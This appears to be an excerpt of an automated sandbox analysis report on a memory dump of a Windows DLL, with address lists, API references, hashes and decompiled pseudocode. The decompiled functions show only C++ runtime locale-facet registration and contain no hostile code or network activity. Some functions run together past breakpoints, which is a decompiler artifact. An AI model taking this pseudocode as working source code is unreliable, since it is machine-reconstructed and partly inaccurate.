0x6d48f708
0x6d48f745
0x6d48f753
0x6d48f758
0x6d48f760
0x6d48f76a
0x6d48f76f
0x6d48f77a
0x6d48f77e
0x6d48f781
0x6d48f786
0x6d48f78f
0x6d48f791
0x6d48f793
0x6d48f7d8
0x6d48f7db
0x6d48f7e7
0x6d48f795
0x6d48f795
0x6d48f797
0x6d48f79d
0x6d48f7a3
0x6d48f7ab
0x6d48f7ae
0x6d48f7eb
0x6d48f7f9
0x6d48f7fe
0x6d48f806
0x6d48f810
0x6d48f815
0x6d48f820
0x6d48f824
0x6d48f827
0x6d48f82c
0x6d48f835
0x6d48f837
0x6d48f839
0x6d48f87e
0x6d48f881
0x6d48f88d
0x6d48f83b
0x6d48f83b
0x6d48f83d
0x6d48f843
0x6d48f849
0x6d48f851
0x6d48f854
0x6d48f891
0x6d48f89f
0x6d48f8a4
0x6d48f8ac
0x6d48f8b6
0x6d48f8bb
0x6d48f8c6
0x6d48f8ca
0x6d48f8cd
0x6d48f8d2
0x6d48f8db
0x6d48f8dd
0x6d48f8df
0x6d48f924
0x6d48f927
0x6d48f933
0x6d48f8e1
0x6d48f8e1
0x6d48f8e3
0x6d48f8e9
0x6d48f8ef
0x6d48f8f7
0x6d48f8fa
0x6d48f937
0x6d48f945
0x6d48f94a
0x6d48f952
0x6d48f95c
0x6d48f961
0x6d48f96c
0x6d48f970
0x6d48f973
0x6d48f978
0x6d48f981
0x6d48f983
0x6d48f985
0x6d48f9ca
0x6d48f9cd
0x6d48f9d9
0x6d48f987
0x6d48f987
0x6d48f989
0x6d48f98f
0x6d48f995
0x6d48f99d
0x6d48f9a0
0x6d48f9dd
0x6d48f9eb
0x6d48f9f0
0x6d48f9f8
0x6d48fa02
0x6d48fa07
0x6d48fa12
0x6d48fa16
0x6d48fa19
0x6d48fa1e
0x6d48fa27
0x6d48fa29
0x6d48fa2b
0x6d48fa70
0x6d48fa73
0x6d48fa7f
0x6d48fa2d
0x6d48fa2d
0x6d48fa2f
0x6d48fa35
0x6d48fa3b
0x6d48fa43
0x6d48fa46
0x6d48fa83
0x6d48fa91
0x6d48fa96
0x6d48fa9e
0x6d48faa8
0x6d48faad
0x6d48fab8
0x6d48fabc
0x6d48fabf
0x6d48fac4
0x6d48facd
0x6d48facf
0x6d48fad1
0x6d48fb16
0x6d48fb19
0x6d48fb25
0x6d48fad3
0x6d48fad3
0x6d48fad5
0x6d48fadb
0x6d48fae1
0x6d48fae9
0x6d48faec
0x6d48fb29
0x6d48fb37
0x6d48fb3c
0x6d48fb44
0x6d48fb4e
0x6d48fb53
0x6d48fb5e
0x6d48fb62
0x6d48fb65
0x6d48fb6a
0x6d48fb73
0x6d48fb75
0x6d48fb77
0x6d48fbbc
0x6d48fbbf
0x6d48fbcb
0x6d48fb79
0x6d48fb79
0x6d48fb7b
0x6d48fb81
0x6d48fb87
0x6d48fb8f
0x6d48fb92
0x6d48fbcf
0x6d48fbdd
0x6d48fbe2
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc19
0x6d48fc1b
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21
0x6d48fb94
0x6d48fb94
0x6d48fb97
0x6d48fb9b
0x6d48fb9f
0x6d48fbac
0x6d48fbb4
0x6d48fbb6
0x00000000
0x6d48fbb6
0x6d48fb7d
0x6d48fb7d
0x00000000
0x6d48fb7d
0x6d48fb7b
0x6d48faee
0x6d48faee
0x6d48faf1
0x6d48faf5
0x6d48faf9
0x6d48fb06
0x6d48fb0e
0x6d48fb10
0x00000000
0x6d48fb10
0x6d48fad7
0x6d48fad7
0x00000000
0x6d48fad7
0x6d48fad5
0x6d48fa48
0x6d48fa48
0x6d48fa4b
0x6d48fa4f
0x6d48fa53
0x6d48fa60
0x6d48fa68
0x6d48fa6a
0x00000000
0x6d48fa6a
0x6d48fa31
0x6d48fa31
0x00000000
0x6d48fa31
0x6d48fa2f
0x6d48f9a2
0x6d48f9a2
0x6d48f9a5
0x6d48f9a9
0x6d48f9ad
0x6d48f9ba
0x6d48f9c2
0x6d48f9c4
0x00000000
0x6d48f9c4
0x6d48f98b
0x6d48f98b
0x00000000
0x6d48f98b
0x6d48f989
0x6d48f8fc
0x6d48f8fc
0x6d48f8ff
0x6d48f903
0x6d48f907
0x6d48f914
0x6d48f91c
0x6d48f91e
0x00000000
0x6d48f91e
0x6d48f8e5
0x6d48f8e5
0x00000000
0x6d48f8e5
0x6d48f8e3
0x6d48f856
0x6d48f856
0x6d48f859
0x6d48f85d
0x6d48f861
0x6d48f86e
0x6d48f876
0x6d48f878
0x00000000
0x6d48f878
0x6d48f83f
0x6d48f83f
0x00000000
0x6d48f83f
0x6d48f83d
0x6d48f7b0
0x6d48f7b0
0x6d48f7b3
0x6d48f7b7
0x6d48f7bb
0x6d48f7c8
0x6d48f7d0
0x6d48f7d2
0x00000000
0x6d48f7d2
0x6d48f799
0x6d48f799
0x00000000
0x6d48f799
0x6d48f797
0x6d48f70a
0x6d48f70a
0x6d48f70d
0x6d48f711
0x6d48f715
0x6d48f722
0x6d48f72a
0x6d48f72c
0x00000000
0x6d48f72c
0x6d48f6f3
0x6d48f6f3
0x00000000
0x6d48f6f3
0x6d48f6f1
0x6d48f664
0x6d48f664
0x6d48f667
0x6d48f66b
0x6d48f66f
0x6d48f67c
0x6d48f684
0x6d48f686
0x00000000
0x6d48f686
0x6d48f64d
0x6d48f64d
0x00000000
0x6d48f64d
0x6d48f64b
0x6d48f5be
0x6d48f5be
0x6d48f5c1
0x6d48f5c5
0x6d48f5c9
0x6d48f5d6
0x6d48f5de
0x6d48f5e0
0x00000000
0x6d48f5e0
0x6d48f5a7
0x6d48f5a7
0x00000000
0x6d48f5a7
0x6d48f5a5
0x6d48f518
0x6d48f518
0x6d48f51b
0x6d48f51f
0x6d48f523
0x6d48f530
0x6d48f538
0x6d48f53a
0x00000000
0x6d48f53a
0x6d48f501
0x6d48f501
0x00000000
0x6d48f501
0x6d48f4ff
0x6d48f472
0x6d48f472
0x6d48f475
0x6d48f479
0x6d48f47d
0x6d48f48a
0x6d48f492
0x6d48f494
0x00000000
0x6d48f494
0x6d48f45b
0x6d48f45b
0x00000000
0x6d48f45b
0x6d48f459

APIs

__EH_prolog3.LIBCMT ref: 6D48F422
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F42C
int.LIBCPMT ref: 6D48F443

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48F47D
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F49D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F4BB

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: cda2ce0c45d0d1204686d30966c80afe2cda17ba3bc6c5bd1d669d83f876b798
Instruction ID: b080cef5a886192b18f6a6d0357cba4e3640b3d37c6ffea784844c8184fb91c8
Opcode Fuzzy Hash: cda2ce0c45d0d1204686d30966c80afe2cda17ba3bc6c5bd1d669d83f876b798
Instruction Fuzzy Hash: 6811E3759082569BCF05EB60C850EEDB775AFA4714F1A400DD612BB395CB70DD0187D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D484747, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6D484747(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t18;
				intOrPtr* _t19;
				intOrPtr* _t39;
				intOrPtr* _t44;
				void* _t47;

				E6D4A00AC(0x6d4e816f, __ebx, __edi, __esi, 0x18);
				E6D486653(_t47 - 0x14, 0);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				_t44 =  *0x6d55ce7c; // 0x4e93d8
				 *((intOrPtr*)(_t47 - 0x10)) = _t44;
				_t18 = E6D46161C(0x6d55ce90);
				_t35 =  *((intOrPtr*)(_t47 + 8));
				_t19 = E6D46171B( *((intOrPtr*)(_t47 + 8)), _t18);
				_t46 = _t19;
				if(_t19 != 0) {
					L5:
					E6D4866BA(_t47 - 0x14);
					return E6D4A0075(_t46);
				} else {
					if(_t44 == 0) {
						_push( *((intOrPtr*)(_t47 + 8)));
						_push(_t47 - 0x10);
						__eflags = E6D484F5F(__ebx, _t35, __edx, _t44, _t46) - 0xffffffff;
						if(__eflags == 0) {
							_t39 = _t47 - 0x20;
							E6D461438(_t39);
							E6D4A3D74(_t47 - 0x20, 0x6d543504);
							asm("int3");
							 *_t39 = __edx;
							return _t39;
						} else {
							_t46 =  *((intOrPtr*)(_t47 - 0x10));
							 *((intOrPtr*)(_t47 - 0x10)) = _t46;
							 *(_t47 - 4) = 1;
							E6D486FD3(__eflags, _t46);
							 *((intOrPtr*)( *_t46 + 4))();
							 *0x6d55ce7c = _t46;
							goto L5;
						}
					} else {
						_t46 = _t44;
						goto L5;
					}
				}
			}

0x6d48474e
0x6d484758
0x6d48475d
0x6d484766
0x6d48476c
0x6d48476f
0x6d484774
0x6d484778
0x6d48477d
0x6d484781
0x6d4847bc
0x6d4847bf
0x6d4847cb
0x6d484783
0x6d484785
0x6d48478b
0x6d484791
0x6d484799
0x6d48479c
0x6d4847cc
0x6d4847cf
0x6d4847dd
0x6d4847e2
0x6d4847e3
0x6d4847e7
0x6d48479e
0x6d48479e
0x6d4847a1
0x6d4847a5
0x6d4847a9
0x6d4847b3
0x6d4847b6
0x00000000
0x6d4847b6
0x6d484787
0x6d484787
0x00000000
0x6d484787
0x6d484785

APIs

__EH_prolog3.LIBCMT ref: 6D48474E
std::_Lockit::_Lockit.LIBCPMT ref: 6D484758
int.LIBCPMT ref: 6D48476F

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D4847A9
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4847BF
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4847DD

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 81c4663d8bb14e234e7bd39f5b0422c3765b75805e30a4f35d96b1dfab53c384
Instruction ID: a8e78c0b9f6d8db69a9497a2f437dd4e5169261919c51a67feb6d383ca776487
Opcode Fuzzy Hash: 81c4663d8bb14e234e7bd39f5b0422c3765b75805e30a4f35d96b1dfab53c384
Instruction Fuzzy Hash: 78110671C081258BCF06DBA4C840EEDB7B9AF59394F26450CE615BB291DB70DD0087D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F7FF, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D48F7FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t125;
				signed int _t126;
				void* _t138;
				void* _t151;
				void* _t164;
				void* _t177;
				void* _t190;
				void* _t203;
				void* _t216;
				signed int _t321;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t374;

				_t346 = __edx;
				_t265 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t374 - 0x14, 0);
				_t357 =  *0x6d546dd8; // 0x0
				 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
				 *(_t374 - 0x10) = _t357;
				_t125 = E6D46161C(0x6d546d84);
				_t268 =  *((intOrPtr*)(_t374 + 8));
				_t126 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t125);
				_t348 = _t126;
				if(_t126 != 0) {
					L5:
					E6D4866BA(_t374 - 0x14);
					return E6D4A0075(_t348);
				} else {
					if(_t357 == 0) {
						_push( *((intOrPtr*)(_t374 + 8)));
						_push(_t374 - 0x10);
						__eflags = E6D491339(__ebx, _t268, __edx, _t348, _t357) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t374 - 0x20);
							E6D4A3D74(_t374 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t348, _t357, 0x14);
							E6D486653(_t374 - 0x14, 0);
							_t358 =  *0x6d546db0; // 0x0
							 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
							 *(_t374 - 0x10) = _t358;
							_t138 = E6D46161C(0x6d546d64);
							_t275 =  *((intOrPtr*)(_t374 + 8));
							_t349 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t138);
							__eflags = _t349;
							if(_t349 != 0) {
								L12:
								E6D4866BA(_t374 - 0x14);
								return E6D4A0075(_t349);
							} else {
								__eflags = _t358;
								if(_t358 == 0) {
									_push( *((intOrPtr*)(_t374 + 8)));
									_push(_t374 - 0x10);
									__eflags = E6D4913A1(_t265, _t275, __edx, _t349, _t358) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t374 - 0x20);
										E6D4A3D74(_t374 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t265, _t349, _t358, 0x14);
										E6D486653(_t374 - 0x14, 0);
										_t359 =  *0x6d546ddc; // 0x0
										 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
										 *(_t374 - 0x10) = _t359;
										_t151 = E6D46161C(0x6d546d88);
										_t282 =  *((intOrPtr*)(_t374 + 8));
										_t350 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t151);
										__eflags = _t350;
										if(_t350 != 0) {
											L19:
											E6D4866BA(_t374 - 0x14);
											return E6D4A0075(_t350);
										} else {
											__eflags = _t359;
											if(_t359 == 0) {
												_push( *((intOrPtr*)(_t374 + 8)));
												_push(_t374 - 0x10);
												__eflags = E6D491409(_t265, _t282, __edx, _t350, _t359) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t374 - 0x20);
													E6D4A3D74(_t374 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t265, _t350, _t359, 0x14);
													E6D486653(_t374 - 0x14, 0);
													_t360 =  *0x6d546de0; // 0x0
													 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
													 *(_t374 - 0x10) = _t360;
													_t164 = E6D46161C(0x6d546d8c);
													_t289 =  *((intOrPtr*)(_t374 + 8));
													_t351 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t164);
													__eflags = _t351;
													if(_t351 != 0) {
														L26:
														E6D4866BA(_t374 - 0x14);
														return E6D4A0075(_t351);
													} else {
														__eflags = _t360;
														if(_t360 == 0) {
															_push( *((intOrPtr*)(_t374 + 8)));
															_push(_t374 - 0x10);
															__eflags = E6D491471(_t265, _t289, _t346, _t351, _t360) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t374 - 0x20);
																E6D4A3D74(_t374 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t265, _t351, _t360, 0x14);
																E6D486653(_t374 - 0x14, 0);
																_t361 =  *0x6d546dfc; // 0x0
																 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																 *(_t374 - 0x10) = _t361;
																_t177 = E6D46161C(0x6d546da8);
																_t296 =  *((intOrPtr*)(_t374 + 8));
																_t352 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t177);
																__eflags = _t352;
																if(_t352 != 0) {
																	L33:
																	E6D4866BA(_t374 - 0x14);
																	return E6D4A0075(_t352);
																} else {
																	__eflags = _t361;
																	if(_t361 == 0) {
																		_push( *((intOrPtr*)(_t374 + 8)));
																		_push(_t374 - 0x10);
																		__eflags = E6D4914EC(_t265, _t296, _t346, _t352, _t361) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t374 - 0x20);
																			E6D4A3D74(_t374 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t265, _t352, _t361, 0x14);
																			E6D486653(_t374 - 0x14, 0);
																			_t362 =  *0x6d546dcc; // 0x0
																			 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																			 *(_t374 - 0x10) = _t362;
																			_t190 = E6D46161C(0x6d546d80);
																			_t303 =  *((intOrPtr*)(_t374 + 8));
																			_t353 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t190);
																			__eflags = _t353;
																			if(_t353 != 0) {
																				L40:
																				E6D4866BA(_t374 - 0x14);
																				return E6D4A0075(_t353);
																			} else {
																				__eflags = _t362;
																				if(_t362 == 0) {
																					_push( *((intOrPtr*)(_t374 + 8)));
																					_push(_t374 - 0x10);
																					__eflags = E6D491558(_t265, _t303, _t346, _t353, _t362) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t374 - 0x20);
																						E6D4A3D74(_t374 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t265, _t353, _t362, 0x14);
																						E6D486653(_t374 - 0x14, 0);
																						_t363 =  *0x6d546e00; // 0x0
																						 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																						 *(_t374 - 0x10) = _t363;
																						_t203 = E6D46161C(0x6d546dac);
																						_t310 =  *((intOrPtr*)(_t374 + 8));
																						_t354 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t203);
																						__eflags = _t354;
																						if(_t354 != 0) {
																							L47:
																							E6D4866BA(_t374 - 0x14);
																							return E6D4A0075(_t354);
																						} else {
																							__eflags = _t363;
																							if(_t363 == 0) {
																								_push( *((intOrPtr*)(_t374 + 8)));
																								_push(_t374 - 0x10);
																								__eflags = E6D4915C4(_t265, _t310, _t346, _t354, _t363) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t374 - 0x20);
																									E6D4A3D74(_t374 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t265, _t354, _t363, 0x14);
																									E6D486653(_t374 - 0x14, 0);
																									_t364 =  *0x6d546dd0; // 0x0
																									 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																									 *(_t374 - 0x10) = _t364;
																									_t216 = E6D46161C(0x6d546d60);
																									_t317 =  *((intOrPtr*)(_t374 + 8));
																									_t355 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t216);
																									__eflags = _t355;
																									if(_t355 != 0) {
																										L54:
																										E6D4866BA(_t374 - 0x14);
																										return E6D4A0075(_t355);
																									} else {
																										__eflags = _t364;
																										if(_t364 == 0) {
																											_push( *((intOrPtr*)(_t374 + 8)));
																											_push(_t374 - 0x10);
																											__eflags = E6D49162A(_t265, _t317, _t346, _t355, _t364) - 0xffffffff;
																											if(__eflags == 0) {
																												_t321 = _t374 - 0x20;
																												E6D461438(_t321);
																												E6D4A3D74(_t374 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e851f, _t265, _t355, _t364, 4);
																												_t365 = _t321;
																												 *(_t374 - 0x10) = _t365;
																												 *((intOrPtr*)(_t365 + 4)) =  *((intOrPtr*)(_t374 + 0xc));
																												_push( *((intOrPtr*)(_t374 + 0x14)));
																												_t119 = _t374 - 4;
																												 *_t119 =  *(_t374 - 4) & 0x00000000;
																												__eflags =  *_t119;
																												 *_t365 = 0x6d4ec0c4;
																												 *((char*)(_t365 + 0x28)) =  *((intOrPtr*)(_t374 + 0x10));
																												E6D49542F(_t265, _t321, _t346, _t355, _t365,  *_t119);
																												return E6D4A0075(_t365,  *((intOrPtr*)(_t374 + 8)));
																											} else {
																												_t355 =  *(_t374 - 0x10);
																												 *(_t374 - 0x10) = _t355;
																												 *(_t374 - 4) = 1;
																												E6D486FD3(__eflags, _t355);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t355 + 4))))();
																												 *0x6d546dd0 = _t355;
																												goto L54;
																											}
																										} else {
																											_t355 = _t364;
																											goto L54;
																										}
																									}
																								} else {
																									_t354 =  *(_t374 - 0x10);
																									 *(_t374 - 0x10) = _t354;
																									 *(_t374 - 4) = 1;
																									E6D486FD3(__eflags, _t354);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t354 + 4))))();
																									 *0x6d546e00 = _t354;
																									goto L47;
																								}
																							} else {
																								_t354 = _t363;
																								goto L47;
																							}
																						}
																					} else {
																						_t353 =  *(_t374 - 0x10);
																						 *(_t374 - 0x10) = _t353;
																						 *(_t374 - 4) = 1;
																						E6D486FD3(__eflags, _t353);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 4))))();
																						 *0x6d546dcc = _t353;
																						goto L40;
																					}
																				} else {
																					_t353 = _t362;
																					goto L40;
																				}
																			}
																		} else {
																			_t352 =  *(_t374 - 0x10);
																			 *(_t374 - 0x10) = _t352;
																			 *(_t374 - 4) = 1;
																			E6D486FD3(__eflags, _t352);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																			 *0x6d546dfc = _t352;
																			goto L33;
																		}
																	} else {
																		_t352 = _t361;
																		goto L33;
																	}
																}
															} else {
																_t351 =  *(_t374 - 0x10);
																 *(_t374 - 0x10) = _t351;
																 *(_t374 - 4) = 1;
																E6D486FD3(__eflags, _t351);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																 *0x6d546de0 = _t351;
																goto L26;
															}
														} else {
															_t351 = _t360;
															goto L26;
														}
													}
												} else {
													_t350 =  *(_t374 - 0x10);
													 *(_t374 - 0x10) = _t350;
													 *(_t374 - 4) = 1;
													E6D486FD3(__eflags, _t350);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
													 *0x6d546ddc = _t350;
													goto L19;
												}
											} else {
												_t350 = _t359;
												goto L19;
											}
										}
									} else {
										_t349 =  *(_t374 - 0x10);
										 *(_t374 - 0x10) = _t349;
										 *(_t374 - 4) = 1;
										E6D486FD3(__eflags, _t349);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
										 *0x6d546db0 = _t349;
										goto L12;
									}
								} else {
									_t349 = _t358;
									goto L12;
								}
							}
						} else {
							_t348 =  *(_t374 - 0x10);
							 *(_t374 - 0x10) = _t348;
							 *(_t374 - 4) = 1;
							E6D486FD3(__eflags, _t348);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
							 *0x6d546dd8 = _t348;
							goto L5;
						}
					} else {
						_t348 = _t357;
						goto L5;
					}
				}
			}

0x6d48f7ff
0x6d48f7ff
0x6d48f806
0x6d48f810
0x6d48f815
0x6d48f820
0x6d48f824
0x6d48f827
0x6d48f82c
0x6d48f830
0x6d48f835
0x6d48f839
0x6d48f87e
0x6d48f881
0x6d48f88d
0x6d48f83b
0x6d48f83d
0x6d48f843
0x6d48f849
0x6d48f851
0x6d48f854
0x6d48f891
0x6d48f89f
0x6d48f8a4
0x6d48f8ac
0x6d48f8b6
0x6d48f8bb
0x6d48f8c6
0x6d48f8ca
0x6d48f8cd
0x6d48f8d2
0x6d48f8db
0x6d48f8dd
0x6d48f8df
0x6d48f924
0x6d48f927
0x6d48f933
0x6d48f8e1
0x6d48f8e1
0x6d48f8e3
0x6d48f8e9
0x6d48f8ef
0x6d48f8f7
0x6d48f8fa
0x6d48f937
0x6d48f945
0x6d48f94a
0x6d48f952
0x6d48f95c
0x6d48f961
0x6d48f96c
0x6d48f970
0x6d48f973
0x6d48f978
0x6d48f981
0x6d48f983
0x6d48f985
0x6d48f9ca
0x6d48f9cd
0x6d48f9d9
0x6d48f987
0x6d48f987
0x6d48f989
0x6d48f98f
0x6d48f995
0x6d48f99d
0x6d48f9a0
0x6d48f9dd
0x6d48f9eb
0x6d48f9f0
0x6d48f9f8
0x6d48fa02
0x6d48fa07
0x6d48fa12
0x6d48fa16
0x6d48fa19
0x6d48fa1e
0x6d48fa27
0x6d48fa29
0x6d48fa2b
0x6d48fa70
0x6d48fa73
0x6d48fa7f
0x6d48fa2d
0x6d48fa2d
0x6d48fa2f
0x6d48fa35
0x6d48fa3b
0x6d48fa43
0x6d48fa46
0x6d48fa83
0x6d48fa91
0x6d48fa96
0x6d48fa9e
0x6d48faa8
0x6d48faad
0x6d48fab8
0x6d48fabc
0x6d48fabf
0x6d48fac4
0x6d48facd
0x6d48facf
0x6d48fad1
0x6d48fb16
0x6d48fb19
0x6d48fb25
0x6d48fad3
0x6d48fad3
0x6d48fad5
0x6d48fadb
0x6d48fae1
0x6d48fae9
0x6d48faec
0x6d48fb29
0x6d48fb37
0x6d48fb3c
0x6d48fb44
0x6d48fb4e
0x6d48fb53
0x6d48fb5e
0x6d48fb62
0x6d48fb65
0x6d48fb6a
0x6d48fb73
0x6d48fb75
0x6d48fb77
0x6d48fbbc
0x6d48fbbf
0x6d48fbcb
0x6d48fb79
0x6d48fb79
0x6d48fb7b
0x6d48fb81
0x6d48fb87
0x6d48fb8f
0x6d48fb92
0x6d48fbcf
0x6d48fbdd
0x6d48fbe2
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc19
0x6d48fc1b
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21
0x6d48fb94
0x6d48fb94
0x6d48fb97
0x6d48fb9b
0x6d48fb9f
0x6d48fbac
0x6d48fbb4
0x6d48fbb6
0x00000000
